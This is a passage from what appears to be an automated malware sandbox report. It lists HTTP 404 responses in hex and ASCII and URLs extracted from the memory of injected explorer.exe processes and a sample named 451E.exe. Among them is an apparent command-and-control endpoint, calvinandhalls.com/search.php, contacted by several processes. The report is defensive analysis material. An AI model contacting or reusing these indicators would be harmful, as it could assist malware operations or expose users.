request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:55:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:55:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:55:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: explorer.exe, 00000001.00000000.1764575122.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1763344774.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1762910279.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 00000001.00000000.1765842009.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                  Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                  Source: explorer.exe, 00000001.00000000.1761280775.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 00000001.00000000.1763817484.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                  Source: explorer.exe, 00000001.00000000.1763817484.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                  Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.0000000000A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/
                  Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/5
                  Source: explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
                  Source: explorer.exe, 0000000B.00000002.2707106638.00000000009E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/earch.php
                  Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/p
                  Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2667025183.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4176755346.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4176575408.0000000001318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4176400478.0000000000827000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4176402726.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.php
                  Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2667025183.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4176755346.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4176575408.0000000001318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4176400478.0000000000827000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4176402726.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                  Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                  Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                  Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.moz
                  Source: 451E.exe, 00000009.00000003.4168022466.000002E004F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: 451E.exe, 00000009.00000002.4176613175.000002E002DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: 451E.exe, 00000009.00000002.4176613175.000002E002E1E000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: 451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: 451E.exe, 00000009.00000002.4177703163.000002E002E77000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: 451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: 451E.exe, 00000009.00000002.4177606675.000002E002E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17pot
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000001.00000000.1765842009.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                  Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 451E.exe, 00000009.00000003.4168022466.000002E004F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000002.4177703163.000002E002E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: 451E.exe, 00000009.00000002.4176613175.000002E002E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
